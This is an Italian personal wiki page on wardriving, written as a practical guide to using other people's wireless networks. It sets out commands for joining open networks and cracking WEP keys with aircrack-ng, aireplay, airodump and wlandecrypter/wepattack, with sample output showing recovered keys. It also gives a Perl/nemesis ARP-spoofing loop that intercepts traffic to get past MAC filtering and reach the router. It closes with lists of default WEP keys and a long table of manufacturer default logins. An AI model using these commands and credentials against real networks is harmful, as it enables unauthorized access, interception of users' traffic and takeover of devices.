Wardriving

From Alessandro's Wiki
Jump to: navigation, search

Chi è un Wardriver?

  • Wardriver è quell'uomo che se ne va ingiro, portatile alla mano a cercare connessioni wireless e ne traccia una mappa. Non importa l'uso che ne fa, se ci navigherà sarà un wardriver buono se attaccherà, decripterà o ingannerà la rete trovata, sarà + un hacker che un wardriver.
  • Io consiglio di utilizzare un pc con linux e una scheda 802.11x con chip Atheros (madwifi). Solitamente D-Link Xtreme.

Scroccare internet

  • una volta configurata la scheda, come ath0 (o eth1 eth7, wlan0 ecc. dipende dalla scheda e dalla distrib.)

siamo pronti per dare un'occhiata e wardriverare.

  • diciamo alla scheda di agganciarsi a qualsiasi rete, qualsiasi canale.
iwconfig ath0 essid any channel 0
  • scanniamo l'aria...
iwlist ath0 scanning

appariranno tutte le reti disponibili, ora bisogna scegliere la rete

  • Prendiamo come esempio la rete wireless
iwconfig ath0 essid wireless
  • se siamo connessi alla rete, vedremo il BSSID dell'acces point.
iwconfig ath0
ifconfig ath0 up
  • la rete adesso è su , ma manca il livello IP, le opzioni sono 2
    • chiedere un ip all'accespoint
dhclient ath0
  • oppure scegliere delle reti a caso, partenda dalla + probabile:
ifconfig ath0 192.168.1.166
  • oppure
ifconfig ath0 192.168.0.166
  • oppure
ifconfig ath0 192.168.100.166
  • oppure
ifconfig ath0 172.16.0.166
  • oppure
ifconfig ath0 10.1.1.166
  • una volta trovata la rete proviamo a fare u nping al router/access point
ping 192.168.1.1
    • se ci ponga al ping, siamo connessi ed è probabile che riusciremo anche a navigare
    • se non pinga, i motivi possono essere un numero molto alto
  1. Il router ha un firewall che blocca il ping
  2. il router ha impostata la sicurezza a livello MAC, una lista di schede di rete accettabili, e il blocco di tutte le schede non conosciute --> vedi + in basso:
  3. il router ha una WEP/WPA, password di protezione.
  4. mentre facevamo il comando di ping, il router si è misteriosamente spento, oppure si è persa la connessione per qualche fattore ambientale, hanno chiuso una finestra (di quelle vere) o qualcuno si è messo tra noi e l'antenna.
  5. non abbiamo azzeccato l'ip del router (di solito è il .1 di una rete, di solito..)
  6. la scheda non funziona
  7. la spina è attaccata?
  8. ecc..

Trovare reti all'infinito

  • se hai un'antenna con cavo e vuoi provare a muoverla per migliorare la ricezione, il comando watch fa comodo.
#!/bin/sh
iwconfig ath0 essid any
watch 'iwlist ath0 scanning |grep -2 Channel'

Niente Paura della WEP

Aircrack

WLAN_39-1.cap è il file dove ho catturato i pacchetti
aircrack-ng -a1 -eWLAN_39 -b00:60:B3:FD:70:57 -m00:0E:35:07:38:B7 -s WLAN_39-1.cap


aircrack-ng -a 1 -m 00:16:0A:06:8B:B3 -b 00:16:0A:06:2A:9C -e "Sweex LW050" -s dump-w-1-ch-6-02.cap

                                                       Aircrack-ng 1.0


                                       [00:00:17] Tested 13626 keys (got 904240 IVs)
  KB    depth   byte(vote)
   0    0/  1   6E(1259008) F8(943360) 0A(937216) 99(935936) 89(935680) A0(934400) 38(932608) 78(932608) 73(930816)
   1    0/  1   69(1231616) 61(944640) 06(941824) C4(941312) 42(940544) 95(935936) 21(935424) E3(933632) 32(932352)
   2    0/  1   63(1238016) E6(945920) E7(944640) 4E(936192) D9(932608) 27(932352) 3E(932096) 93(931072) EE(931072)
   3    0/  1   6F(1248256) 63(938496) 6A(936704) 4D(936448) 92(934400) 60(932352) 25(931584) 6B(929792) E8(927488)
   4    0/  1   31(1227264) B4(947200) DF(943616) 7C(938752) 7B(934656) 30(931328) D9(929792) E5(929536) 0B(928256)
   5    0/  1   33(1232896) 7C(950528) 50(946688) 36(941824) E2(941568) 3F(938240) 89(937472) C1(933632) 68(933376)
   6    0/  1   35(1192192) 72(946944) FD(944128) CA(939776) 6B(938240) 81(935936) 97(933632) 4B(933376) 6D(932608)
   7    0/  1   38(1197824) EA(941312) C7(938240) 2A(935424) B4(934400) 85(932864) 79(930048) 4F(929536) F1(928512)
   8    0/  1   32(1180672) 43(946432) DF(940544) 2B(935680) 4D(934912) 1C(934144) 7A(933888) FB(933376) 98(931840)
   9    0/  1   33(1200128) A0(950016) 39(939520) C9(939264) B4(937984) 59(934912) 66(933376) 0A(932608) EE(932608)
  10    0/  1   7A(961024) 35(941824) 8F(941312) 06(938752) A7(935424) 23(934656) 08(933632) C3(933632) 24(933376)
  11    3/  1   AF(938496) 82(935936) 9C(934912) B1(934400) 11(932864) 1D(932608) 1B(931840) FC(931840) 40(930304)
  12    0/  1   34(1059824) 15(947576) 63(937100) EF(931872) 7D(930464) CE(929532) EC(928572) 9E(927728) D8(927612)
    KEY FOUND! [ 6E:69:63:6F:31:33:35:38:32:33:35:38:34 ] (ASCII: nico135823584 )
       Decrypted correctly: 100%

WPA

http://docs.alkaloid.net/index.php/Cracking_WEP_and_WPA_Wireless_Networks#WPA_Crackin

Generare traffico

  • con aireplay si fa così:
aireplay ath0 -3 -b 00:11:95:9D:74:1C -h 00:90:96:65:E5:47 -a 00:11:95:9D:74:1C -e ADSL-WIRELESS
  • Nel frattempo catturiamo con airodump:
airodump ath0 WLAN_11-1 6

L'output + o meno sarà:

 BSSID              PWR  Beacons      IP / # Data  CH  MB  ENC  ESSID
 00:11:95:9D:74:1C   10     8595           101469   6  54  WEP  ADSL-WIRELESS
 BSSID              STATION            PWR   Packets  ESSID
 00:11:95:9D:74:1C  00:90:96:65:E5:47   -2     56435  ADSL-WIRELESS

AccessPoints WLAN_XX

  • Ho ricevuto un router dalla mia compagnia telefonica con una wep impostata, ma ho perso il foglietto con la chiave... la troverò usando un programma chiamato wlandecrypter usato assieme a wepattack. Servirà anche airodump.
  • vediamo che canale, che essid e che bssid (AP MAC) ha:
iwlist ath0 scan
  • Catturo i pacchetti: (airodump "interfaccia_wifi" "output_file" "channel")
airodump ath0 WLAN_12 6
  • aspetto fino a che non cominciano ad entrare pacchetti di dati ("Data"), poi quando cominciano a essere almeno una decina o un centinaio, premo Control-C per interrompere.
  • adesso passo il file .cap che ha generato airodump e lo passo a wepcrack(airodump genera 2 file, un .cap con i pacchetti e un .txt con le informazioni sugli host e gli AP) wlandecrypter bssid essid | wepattack -f output_name.cap
wlandecrypter 00:60:B3:XX:70:XX WLAN_12 | wepattack -f WLAN_12.cap 
  • L'output sarà + o meno questo:
wlandecrypter 0.4 - (c) 2006 nilp0inter2k6_at_gmail.com
------------>  http://www.rusoblanco.com  <------------
 [+] BSSID: 00:60:B3:77:77:77
 [+] Modelo: Z-com
 [+] ESSID: WLAN_39
 [+] Seleccionada salida estandar

Extraction of necessary data was successfull!

Founded BSSID:
1)  00 60 B3 FD 70 77 / Key 0
1 network loaded...

Accepting wordlist data...

key no. 10000: Z001349270F39
key no. 20000: Z0013494E1F39
key no. 30000: Z001349752F39

++++++++++ Packet decrypted! ++++++++++  
BSSID: 00 60 B3 44 44 44 / Key 0        WepKey: 5A 30 30 31 33 34 39 37 42 30 32 33 39 (Z0013497B0239) 
Encryption: 128 Bit 

time: 11.580097 sec     words: 31492


Access Points SpeedTouccXXXXX / ThomsonXXXX

The default password is generated by an algorithm so, with a simple "while" you can get the password from the mac address and the ESSID , there is a software to do that or a website.

http://www.nickkusters.com/SpeedTouch.aspx

Filtraggio di MAC

  • Questo sistema di protezione ha senso ma non troppo perché l'indirizzo univoco della scheda wifi può essere falsificato, per esempio si potrebbe copiare quello che usa l'utente della rete e farsi scambiare per amico dall'accespoint. Ecco come si fa:
    • è necessario avere perl
    • è necessario il programma nemesis
    • anche uno sniffer serve, come tcpdump o meglio (+ visuale) ethereal e ethereal-gnome come interfaccia.
    • sarà molto utile la tabella a pié di pagina, sulle password di fabbrica dei router e/o access points.
    • immaginazione.

Trovare un indirizzo mac autorizzato:

  1. connettiamoci alla rete, anche se non riceviamo e non possiamo inviare pacchetti, basta che la scheda sia associata all'acces point (si vede il BSSID da iwconfig che è tipo un xx:xx:xx:xx:xx:xx....)
  2. apriamo il nostro sniffer, e cominciamo ad annotarci tutti gli indirizzi MAC che vediamo. Escludiamo quello della nostra scheda,
tcpdump -i ath0 -n -e -q ether host 00:01:38:4D:83:E9
  • questo comando comincerà a stampare linee tate quanti pacchetti passano per l'interfaccia ath0 e che abbiano il mac address del mittente o ricevente = a "00:01:38:4d:83:e9"
14:49:26.143433 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 60: 212.35.207.11.80 > 192.168.1.82.36491: tcp 0
14:49:26.296083 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 379: 207.46.109.59.1863 > 192.168.1.82.45046: tcp 313
14:49:26.296126 00:13:8f:a3:0c:07 > 00:01:38:4d:83:e9, IPv4, length 66: 192.168.1.82.45046 > 207.46.109.59.1863: tcp 0
  • vediamo che 00:01:38:4d:83:e9 comunica con 00:13:8f:a3:0c:07, quindi se questo non è il MAC della nostra scheda, possiamo prendelo come documento falso da usare con il router, con nemesis:
    • MAC mia scheda 00:01:29:25:27:0e
    • MAC router 00:01:38:4d:83:e9 -> IP 192.168.1.1
    • MAC utente autorizzato router: 00:13:8f:a3:0c:07 -> IP 192.168.1.200
  • ora bisogna creare un triango, ossia far credere al router che l'utente siamo noi e contemporaneamente all'utente che il router siamo noi. Questo è possibile generando un pacchetto che dica: 'sono il router e ho questo MAC(il nostro)' all'utente e 'sono l'utente e ho questo MAC(il nostro)' al router.
  • parliamo con il router:
perl -e 'while(1){print "Deviando..\n"; system(" \
nemesis arp -v -r -d ath0 \
-S 192.168.1.200 -D 192.168.1.1 \
-h 00:01:29:25:27:0e -m 00:0B:6A:76:97:AF \
-H 00:00:61:74:68:30 -M 00:0B:6A:76:97:AF \
"); sleep 10; }'
  • parliamo con l'utente:
perl -e 'while(1){print "Deviando..\n"; system(" \
nemesis arp -v -r -d ath0 \
-S 192.168.1.1 -D 192.168.1.200 \
-h 00:01:29:25:27:0e -m 00:13:8f:a3:0c:07 \
-H 00:01:29:25:27:0e -M 00:01:38:4d:83:e9 \
"); sleep 10; }'
  • Questi comandi loopperanno all'infinito, vanno eseguiti in 2 terminali diversi oppure appiccicarli in una chiamata unica di perl, e il risultato sarà che tutto il traffico tra router e utente passerà per la nostra scheda. Così facendo possiamo preovare ad entrare nel router e aggiungere il nostro mac alla lista di "amici".

Defaults WEP Keys

  • CIFRADO 64BITS:
FFFFFFFFFF
0000000000
0101010101
0202020202
0303030303
0404040404

  • Netgear
Default WEP KEY1: 11 11 11 11 11
Default WEP KEY2: 20 21 22 23 24
Default WEP KEY3: 30 31 32 33 34
Default WEP KEY4: 40 41 42 43 44

  • CIFRADO 128BITS:
FFFFFFFFFFFFFFFFFFFFFFFFFF
00000000000000000000000000
01010101010101010101010101

  • Zyxel
64-bit WEP with 5 characters
Key1= 2e3f4
Key2= 5y7js
Key3= 24fg7
Key4= 98jui

  • 64-bit WEP with 10 hexadecimal digits
('0-9', 'A-F')
Key1= 0x123456789A
Key2= 0x23456789AB
Key3= 0x3456789ABC
Key4= 0x456789ABCD

  • 128-bit WEP with 13 characters
Key1= 2e3f4w345ytre
Key2= 5y7jse8r4i038
Key3= 24fg70okx3fr7
Key4= 98jui2wss35u4

  • 128-bit WEP with 26 hexadecimal digits
('0-9', 'A-F')
Key1= 0x112233445566778899AABBCDEF
Key2= 0x2233445566778899AABBCCDDEE
Key3= 0x3344556677889900AABBCCDDFF
Key4= 0x44556677889900AABBCCDDEEFF 

Default Passwords by Manufacturer

MFabbricante Modello OS Versione Login Password

3Com 	- 	1.25 	root 	letmein
3Com 	Super Stack 2 Switch 	Any 	manager 	manager
3Com 	AccessBuilder® 7000 BRI 	Any 	- 	-
3Com 	CoreBuilder 2500 	- 	- 	-
3Com 	Switch 3000/3300 	- 	manager 	manager
3Com 	Switch 3000/3300 	- 	admin 	admin
3Com 	Switch 3000/3300 	- 	security 	security
3com 	Cable Managment System SQL Database (DOSCIC DHCP) 	Win2000 & MS 	DOCSIS_APP 	3com
3Com 	NAC (Network Access Card) 	- 	adm 	none
3Com 	HiPer ARC Card 	v4.1.x of HA 	adm 	none
3Com 	CoreBuilder 6000 	- 	debug 	tech
3Com 	CoreBuilder 7000 	- 	tech 	tech
3Com 	SuperStack II Switch 2200 	- 	debug 	synnet
3Com 	SuperStack II Switch 2700 	- 	tech 	tech
3Com 	SuperStack / CoreBuilder 	- 	admin 	-
3Com 	SuperStack / CoreBuilder 	- 	read 	-
3Com 	SuperStack / CoreBuilder 	- 	write 	-
3Com 	LinkSwitch and CellPlex 	- 	tech 	tech
3Com 	LinkSwitch and CellPlex 	- 	debug 	synnet
3com 	Superstack II 3300FX 	- 	admin 	-
3com 	Switch 3000/3300 	- 	Admin 	3com
3com 	3comCellPlex7000 	- 	tech 	tech
3Com 	Switch 3000/3300 	- 	monitor 	monitor
3Com 	AirConnect Access Point 	n/a 	- 	comcomcom
3com 	Superstack II Dual Speed 500 	- 	security 	security
3Com 	OfficeConnect 5x1 	at least 5.x 	- 	PASSWORD
3Com 	SuperStack 3 Switch 3300XM 	- 	admin 	-
3com 	Super Stack 2 Switch 	Any 	manager 	manager
3Com 	SuperStack II Switch 1100 	- 	manager 	manager
3Com 	SuperStack II Switch 1100 	- 	security 	security
3com 	super stack 2 switch 	any 	manager 	manager
3Com 	Office Connect Remote 812 	- 	root 	!root
3Com 	Switch 3000/3300 	- 	admin 	admin
3COM 	OCR-812 	- 	- 	-
3com 	- 	- 	- 	-
3com 	NBX100 	2.8 	administrator 	0000
3com 	Home Connect 	- 	User 	Password
3Com 	OfficeConnect 5x1 	at least 5.x 	estheralastruey 	-
3Com 	SuperStack II Switch 3300 	- 	manager 	manager
3Com 	Superstack 	- 	- 	-
ACC 	Routers 	- 	netman 	netman
Acc/Newbridge 	Congo/Amazon/Tigris 	All versions 	netman 	netman
Acc/Newbridge 	Congo/Amazon/Tigris 	All versions 	netman 	netman
adaptec 	- 	- 	- 	-
Adaptec RAID 	Storage Manager Pro 	All 	Administrator 	adaptec
adtran 	tsu 600 ethernet module 	- 	18364 	-
Adtran 	TSU 120 e 	- 	- 	ADTRAN
Adtran 	TSU 120 e 	- 	- 	ADTRAN
Aironet 	All 	- 		
alcatel 	- 	- 	- 	-
Alcatel 	1000 ANT 	Win98 	- 	-
alcatel 	speed touch home 	- 	- 	-
Alcatel/Newbridge/Timestep 	VPN Gateway 15xx/45xx/7xxx 	Any 	root 	permit
Alcatel/Newbridge/Timestep 	VPN Gateway 15xx/ 	Any 	root 	permit
Alcatel/Newbridge/Timestep 	VPN Gateway 15xx/ 	Any 	root 	permit
Allied Tenysin 	R130 	- 	Manager 	friend
Alteon 	ACEswitch 180e (telnet) 	- 	admin 	blank
Alteon Web Systems 	All hardware releases 	Web OS 5.2 	none 	admin
APC 	MasterSwitches 	- 	apc 	apc
APC 	Any 	Firmware Pri 	apcuser 	apc
Apple 	Network Assistant 	3.X 	None 	xyzzy
Apple 	Airport 	1.1 	none 	public
Arrowpoint 	any? 	- 	admin 	system
Ascend 	All TAOS models 	all 	admin 	Ascend
Ascend 	Pipeline Terminal Server 	- 	answer 	-
Ascom 	Timeplex Routers 	Any 	See notes 	-
AT&T 	Starlan SmartHUB 	9.9 	N/A 	manager
AWARD 	Any BIOS 	- 	AWARD_SW 	-
Axent 	NetProwler manager 	WinNT 	administrator 	admin
Axis 	NPS 530 	5.02 	root 	pass
AXIS 	StorPoint CD100 	4.28 	root 	pass
AXIS 	200 V1.32 	- 	admin 	-
Axis 	2100 Network Camera 	Linux (ETRAX 	root 	pass
bay 	cv1001003 	- 	- 	-
bay 	- 	- 	- 	-
Bay 	- 	- 	- 	-
Bay / Nortel 	ARN 	13.20 	Manager (caps count !) 	-
Bay Network Routers 	All 	- 	User 	-
Bay Networks 	ASN / ARN Routers 	Any 	Manager 	Manager
Bay Networks 	Baystack 	- 	- 	NetICs
Bay/Nortel Networks 	Accelar 1xxx switches 	Any 	rwa 	rwa
Bay/Nortel Networks 	Remote Annex 2000 	Any 	admin 	IP address
BEA 	Weblogic 	5.1 	system 	weblogic
BEA 	- 	- 	- 	-
bewan 	- 	- 	- 	-
Bintec 	all Routers 	Any 	admin 	bintec
Bintec 	- 	- 	- 	-
Biodata 	BIGfire & BIGfire+ 	all 	- 	biodata
Biodata 	all Babylon-Boxes 	all 	- 	Babylon
Borland 	interbase 	- 	- 	-
Borland 	Interbase 	Any 	politcally 	correct
Borland/Inprise 	Interbase 	any 	SYSDBA 	masterkey
BreezeCom 	AP10, SA10 	BreezeNET PR 	- 	-
BreezeCOM 	Station Adapter and Access Point 	4.x 	- 	Super
BreezeCOM 	- 	3.x 	- 	Master
BreezeCOM 	Station Adapter and Access Point 	2.x 	- 	laflaf
Brocade 	Silkworm 	- 	admin 	password
Buffalo/MELCO 	AirStation WLA-L11 	- 	root (cannot be changed) 	(no password by default)
Cabletron 	any 	any 	-- 	--
Cabletron 	NB Series 	Any 	- 	inuvik49
Cabletron routers and switches 	* 	* 	blank 	blank
Cayman 	3220-H DSL Router 	GatorSurf 5. 	Any 	-
celerity 	- 	- 	- 	-
Chase Research 	Iolan+ 	- 	- 	iolan
Cisco 	Any Router and Switch 	10 thru 12 	cisco 	cisco
Cisco 	ConfigMaker Software 	any? 	n/a 	cmaker
CISCO 	Network Registrar 	3.0 	ADMIN 	changeme
CISCO 	N/A 	N/A 	pixadmin 	pixadmin
Cisco 	routers 	Not sure...j 	- 	san-fran
Cisco 	VPN 3000 Concentrator 	- 	admin 	admin
Cisco 	Net Ranger 2.2.1 	Sol 5.6 	root 	attack
cisco 	1600 	12.05 	- 	-
cisco 	1601 	- 	- 	-
cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	MGX 	* 	superuser 	superuser
cisco 	1601 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	any 	aany IOS 	no default login 	no default password
CISCO 	arrowpoint 	- 	- 	-
cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	2503 	- 	- 	-
Cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	IDS (netranger) 	- 	root 	attack
cisco 	- 	- 	- 	-
cisco 	1600 	- 	- 	-
CMOS BIOS 	- 	- 	- 	ESSEX or IPC
Cobalt 	RaQ * Qube* 	Any 	admin 	admin
Com21 	- 	- 	- 	-
Comersus Shopping Cart 	3.2 	Win 95/98/NT 	admin 	dmr99
Compaq 	Insight Manager 	- 	Administrator 	administrator
Compaq 	Insight Manager 	- 	operator 	operator
Compaq 	Management Agents 	All 	administrator 	none
compaq 	- 	- 	- 	-
copper mountain 	- 	- 	- 	-
Coppercom 	- 	- 	- 	-
Coyote-Point 	Equaliser 4 	Free BSD 	eqadmin - Serial port only 	equalizer
Coyote-Point 	Equaliser 4 	Free BSD 	root - Serial port only 	-
Coyote-Point 	Equaliser 4 	Free BSD 	look - Web Browser only (Read a 	look
Coyote-Point 	Equaliser 4 	Free BSD 	touch - Web Browser only (Write 	touch
Cyclades 	MP/RT 	- 	super 	surt
D-Link 	DI-704 	- 	- 	admin
D-Link 	DI-701 	2.22 (?) 	- 	-
Dell 	PowerVault 50F 	WindRiver (E 	root 	calvin
Dell 	PowerVault 35F 	- 	root 	calvin
Dell 	Powerapp Web 100 Linux 	RedHat 6.2 	root 	powerapp
dell 	- 	- 	- 	-
Digiboard 	Portserver 8 & 16 	any 	root 	dbps
DLink 	DI-206 ISDN router 	1.* 	Admin 	Admin
Dlink 	Dl-106 ISDN router 	- 	- 	1234
DLink 	DL-701 Cable/DSL Gateway/Firewall 	- 	- 	year2000
Dlink 	DFE-538TX 10/100 Adapter 	Windows 98 	- 	-
dlink 	di704 	- 	- 	admin
DLink 	DI 106 	winnt 	administrator 	@*nigU^D.ha,;
Dupont Digital Water Proofer 	Sun Sparc 	any 	root 	par0t
eci 	- 	- 	- 	-
Efficient 	- 	- 	- 	-
Elron 	Firewall 	2.5c 	hostname/ip address 	sysadmin
emai 	hotmail 	- 	- 	-
Ericsson 	ACC 	- 	netman 	netman
Ericsson (formerly ACC) 	Any router 	all 	netman 	netman
Extended Systems 	ExtendNet 4000 / Firewall 	all Versions 	admin 	admin
Extended Systems 	Print Servers 	- 	admin 	extendnet
Extreme 	All Summits 	- 	admin 	-
extreme 	black diamond 	- 	- 	-
Extreme 	All 	All 	Admin 	-
Flowpoint 	144, 2200 DSL Routers 	ALL 	- 	password
FlowPoint 	144, 2200 DSL Routers 	ALL 	- 	admin
Flowpoint 	2200 	- 	- 	Serial Num
Flowpoint 	2200 	- 	- 	Serial Num
fore 	- 	- 	- 	-
Fore Systems 	ASX 1000/1200 	6.x 	ami 	-
Foundry Networks 	ServerIronXL 	Any 	- 	-
fujitsu 	l460 	- 	- 	-
Future Networks 	FN 110C Docsis cablemodem 	Any 	- 	-
gatway 	solo9100 	win95 	- 	-
General Instruments 	SB2100D Cable Modem 	- 	test 	test
gonet 	- 	- 	fast 	abd234
Hewlett Packard 	HP Jetdirect (All Models) 	Any 	none 	none
Hewlett Packard 	MPE-XL 	- 	HELLO 	MANAGER.SYS
Hewlett Packard 	MPE-XL 	- 	HELLO 	MGR.SYS
Hewlett Packard 	MPE-XL 	- 	HELLO 	FIELD.SUPPORT
Hewlett Packard 	MPE-XL 	- 	MGR 	CAROLIAN
Hewlett Packard 	MPE-XL 	- 	MGR 	CCC
Hewlett Packard 	MPE-XL 	- 	OPERATOR 	COGNOS
Hewlett Packard 	MPE-XL 	- 	MANAGER 	HPOFFICE
hp 	4150 	- 	- 	-
hp 	- 	- 	- 	-
IBM 	AS/400 	- 	qsecofr 	qsecofr
IBM 	AS/400 	- 	qsysopr 	qsysopr
IBM 	AS/400 	- 	qpgmr 	qpgmr
IBM 	NetCommerce PRO 	3.2 	ncadmin 	ncadmin
IBM 	LAN Server / OS/2 	2.1, 3.0, 4. 	username 	password
IBM 	2210 	RIP 	def 	trade
IBM 	DB2 	WinNT 	db2admin 	db2admin
IBM 	Lotus Domino Go WebServer (net.commerce edition) 	ANY ? 	webadmin 	webibm
IBM 	AS400 	Any 	QSECOFR 	QSECOFR
IBM 	RS/6000 	AIX 	root 	ibm
IBM 	- 	OS/400 	QSECOFR 	QSECOFR
IBM 	AS400 	- 	QSRVBAS 	QSRVBAS
IBM 	AS400 	- 	QSRV 	QSRV
ibm 	as400 	- 	- 	-
IBM 	AS/400 	OS/400 	QUSER 	QUSER
IBM 	AS/400 	- 	- 	-
IBM 	ra6000 	AIX Unix 	- 	-
IBM 	AIX 	- 	- 	-
Imperia Software 	Imperia Content Managment System 	Unix/NT 	superuser 	superuser
Intel 	510T 	Any 	- 	admin
Intel 	All Routers 	All Versions 	- 	babbit
Intel 	All Routers 	All Versions 	- 	babbit
Intel 	Intel PRO/Wireless 2011 Wireless LAN Access Point 	Any 	- 	Intel
Intel 	wireless lan access Point 	- 	- 	comcomcom
Ipswitch 	Whats up Gold 6.0 	Windows 9x a 	admin 	admin
janta sales 	254 	compaq 	janta sales 	janta211
janta sales 	254 	compaq 	janta sales 	janta211
Jetform 	Jetform_design 	- 	Jetform 	-
Kawa 	- 	- 	- 	-
LANCAST 	- 	- 	- 	-
Lantronix 	LPS1-T Print Server 	j11-16 	any 	system
Lantronix 	MSS100, MSSVIA, UDS10 	Any 	- 	system
Lantronix 	LSB4 	any 	any 	system
Lantronix 	Printer and terminalservers 	- 	- 	system
LGIC 	Goldstream 	2.5.1 	LR-ISDN 	LR-ISDN
Linkou School 	- 	- 	bill 	bill
Linkou School 	- 	- 	bill 	bill
Linksys 	Cable/DSL router 	Any 	- 	admin
Linksys 	BEFSR7(1) OR (4) 	Standalone R 	blank 	admin
linksys 	- 	- 	- 	-
Linksys 	BEFSR41 	- 	(blank) 	admin
Livingston 	Livingston_portmaster2/3 	- 	!root 	blank
Livingston 	Livingston_officerouter 	- 	!root 	blank
Lucent 	Portmaster 2 	- 	!root 	none
Lucent 	Cajun Family 	- 	root 	root
lucent 	Portmaster 3 	unknown 	!root 	!ishtar
Lucent 	Packetstar (PSAX) 	- 	readwrite 	lucenttech1
Lucent 	AP-1000 	- 	public 	public
lucent 	dsl 	- 	- 	-
lucent 	- 	- 	- 	-
macromedia 	freehand 	9 	- 	-
MacSense 	X-Router Pro 	- 	admin 	admin
mcafee 	- 	- 	- 	-
microcom 	hdms 	unknowen 	system 	hdms
Micron 	- 	bios 	- 	-
Microrouter (Cisco) 	Any 	Any 	- 	letmein
Microrouter (Cisco) 	Any 	Any 	- 	letmein
Microsoft 	Windows NT 	All 	Administrator 	-
Microsoft 	Windows NT 	All 	Guest 	-
Microsoft 	Windows NT 	All 	Mail 	-
Microsoft 	SQL Server 	- 	sa 	-
Microsoft 	Windows NT 	4.0 	pkoolt 	pkooltPS
Microsoft 	NT 	- 	- 	start
MICROSOFT 	NT 	4.0 	free user 	user
Microsoft 	Windows NT 	4.0 	admin 	admin
MICROSOFT 	NT 	4.0 	free user 	user
Microsoft 	- 	- 	- 	-
microsoft 	- 	- 	- 	-
Microsoft 	Ms proxy 2.0 	- 	- 	-
microsoft 	- 	- 	- 	-
mICROSOFT 	- 	- 	- 	-
Microsoft 	Key Managment Server 	Windows NT 4 	- 	password
Microsoft 	- 	- 	- 	-
Motorola 	Motorola-Cablerouter 	- 	cablecom 	router
Motorola 	Motorola-Cablerouter 	- 	cablecom 	router
motorola 	cyber surfer 	- 	- 	-
msdloto 	msdloto 	- 	- 	-
msdloto 	- 	- 	- 	-
Multi-Tech 	RASExpress Server 	5.30a 	guest 	none
Nanoteq 	NetSeq firewall 	* 	admin 	NetSeq
NetApp 	NetCache 	any 	admin 	NetCache
Netgaer 	RH328 	- 	- 	1234
Netgear 	RH348 	- 	- 	1234
Netgear 	ISDN-Router RH348 	- 	- 	1234
Netgear 	RT311 	Any 	Admin 	1234
Netgear 	RT314 	Any 	Admin 	1234
Netgear 	RT338 	- 	- 	1234
Netgear 	RT311/RT314 	- 	admin 	1234
netgear 	- 	- 	- 	-
netlink 	rt314 	- 	- 	-
Netopia 	R7100 	4.6.2 	admin 	admin
Netopia 	455 	v3.1 		
Netscreen 	NS-5, NS10, NS-100 	2.0 	netscreen 	netscreen
NeXT 	- 	NeXTStep 3.3 	me 	-
Nokia - Telecom NZ 	M10 	- 	Telecom 	Telecom
Nortel 	Meridian 1 PBX 	OS Release 2 	0000 	0000
Nortel 	Contivity Extranet Switches 	2.x 	admin 	setup
Nortel 	Norstar Modular ICS 	Any 	**ADMIN (**23646) 	ADMIN (23646)
Nortel 	Norstar Modular ICS 	Any 	**CONFIG (266344) 	CONFIG (266344)
Nortel Networks (Bay) 	Instant Internet 	Any 	- 	-
Northern Telecom(Nortel) 	Meridian 1 	- 	- 	m1link
Novell 	NetWare 	Any 	guest 	-
Novell 	NetWare 	any 	PRINT 	-
Novell 	NetWare 	Any 	LASER 	-
Novell 	NetWare 	Any 	HPLASER 	-
Novell 	NetWare 	Any 	PRINTER 	-
Novell 	NetWare 	Any 	LASERWRITER 	-
Novell 	NetWare 	Any 	POST 	-
Novell 	NetWare 	Any 	MAIL 	-
Novell 	NetWare 	Any 	GATEWAY 	-
Novell 	NetWare 	Any 	GATE 	-
Novell 	NetWare 	Any 	ROUTER 	-
Novell 	NetWare 	Any 	BACKUP 	-
Novell 	NetWare 	Arcserve 	CHEY_ARCHSVR 	WONDERLAND
Novell 	NetWare 	Any 	WINDOWS_PASSTHRU 	-
novell 	- 	- 	- 	-
ODS 	1094 IS Chassis 	4.x 	ods 	ods
Optivision 	Nac 3000 & 4000 	any 	root 	mpegvideo
Oracle 	8i 	8.1.6 	sys 	change_on_install
Oracle 	Internet Directory Service 	any 	cn=orcladmin 	welcome
Oracle 	7 or later 	- 	system 	manager
Oracle 	7 or later 	- 	sys 	change_on_install
Oracle 	7 or later 	Any 	Scott 	Tiger
Oracle 	8i 	all 	internal 	oracle
oracle 	- 	- 	- 	-
oracle 	- 	- 	- 	-
oracle co. 	Database engines 	every 	sys 	change_on_install
Osicom(Datacom) 	Osicom(Datacom) 	- 	sysadm 	sysadm
Pandatel 	EMUX 	all 	admin 	admin
PlainTree 	Waveswitch 100 	- 	- 	default.password
RapidStream 	RS4000-RS8000 	Linux 	rsadmin 	rsadmin
realtek 	8139 	- 	- 	-
Remedy 	Any 	Any 	Demo 	-
Research Machines 	Classroom Assistant 	Windows 95 	manager 	changeme
Rodopi 	Rodopi billing software 'AbacBill' sql database 	- 	rodopi 	rodopi
Samba 	SWAT Package 	Linux 	Any Local User 	Local User password
schoolgirl 	member 	- 	ich 	hci
Securicor3NET 	Monet 	any 	manager 	friend
Securicor3NET 	Cezzanne 	any 	manager 	friend
SGI 	all 	all 	root 	n/a
SGI 	Embedded Support Partner 	IRIX 6.5.6 	Administrator 	Partner
SGI 	IRIX 	ALL 	lp 	lp
SGI 	IRIX 	ALL 	OutOfBox, demos, guest, 4DGifts 	(none by default)
SGI 	IRIX 	ALL 	EZsetup 	-
Shiva 	LanRover 	any? 	root 	-
Shiva 	AccessPort 	Any 	hello 	hello
Shiva 	Any? 	- 	Guest 	blank
SMC 	Barricade 	- 	- 	admin
soho 	nbg800 	unknown 	admin 	1234
Solaris 	- 	- 	- 	-
sonic wall 	any firewall device 	admin 	password 	-
SonicWall 	Any Firewall Device 	- 	admin 	password
SpeedStream 	- 	- 	- 	-
Spider Systems 	M250 / M250L 	- 	- 	hello
Sprint PCS 	SCH2000 	see notes 	Menu - 8 - 0 (see notes) 	040793
Ssangyoung 	SR2501 	- 	- 	2501
Sun 	- 	SunOS 4.1.4 	root 	-
Sun 	- 	Solaris 	- 	-
surecom 	ep3501/3506 	own os 	admin 	surecom
Symnatec 	- 	- 	- 	-
SysKonnect 	6616 	- 	default.password 	-
SysKonnect 	6616 	- 	default.password 	-
